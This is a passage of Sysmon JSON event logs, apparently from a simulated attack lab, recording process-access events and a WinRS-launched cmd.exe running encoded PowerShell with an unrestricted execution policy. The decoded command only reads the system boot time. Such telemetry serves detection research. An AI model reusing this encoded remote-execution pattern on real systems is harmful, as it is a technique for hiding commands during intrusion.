C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:51.988","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","SourceProcessId":"1336","SourceThreadId":"1660","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-108F-5F25-0000-0010BFB50400}","TargetProcessId":"4600","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2634,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.003\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.003","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2635,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.003\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.003","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2636,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.003\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.003","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2637,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.007\r\nProcessGuid: {E2A3D6B1-1090-5F25-0000-001083B80400}\r\nProcessId: 4676\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-108F-5F25-0000-002089B50400}\r\nLogonId: 0x4B589\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-108F-5F25-0000-0010BFB50400}\r\nParentProcessId: 4600\r\nParentImage: C:\\Windows\\System32\\winrshost.exe\r\nParentCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.007","ProcessGuid":"{E2A3D6B1-1090-5F25-0000-001083B80400}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-108F-5F25-0000-002089B50400}","LogonId":"0x4b589","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-108F-5F25-0000-0010BFB50400}","ParentProcessId":"4600","ParentImage":"C:\\Windows\\System32\\winrshost.exe","ParentCommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2638,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.003\r\nSourceProcessGUID: {E2A3D6B1-108F-5F25-0000-0010BFB50400}\r\nSourceProcessId: 4600\r\nSourceThreadId: 4656\r\nSourceImage: C:\\Windows\\system32\\WinrsHost.exe\r\nTargetProcessGUID: {E2A3D6B1-1090-5F25-0000-001083B80400}\r\nTargetProcessId: 4676\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.003","SourceProcessGUID":"{E2A3D6B1-108F-5F25-0000-0010BFB50400}","SourceProcessId":"4600","SourceThreadId":"4656","SourceImage":"C:\\Windows\\system32\\WinrsHost.exe","TargetProcessGUID":"{E2A3D6B1-1090-5F25-0000-001083B80400}","TargetProcessId":"4676","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2639,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.003\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1090-5F25-0000-001083B80400}\r\nTargetProcessId: 4676\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.003","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1090-5F25-0000-001083B80400}","TargetProcessId":"4676","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2640,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.003\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.003","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2641,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.003\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 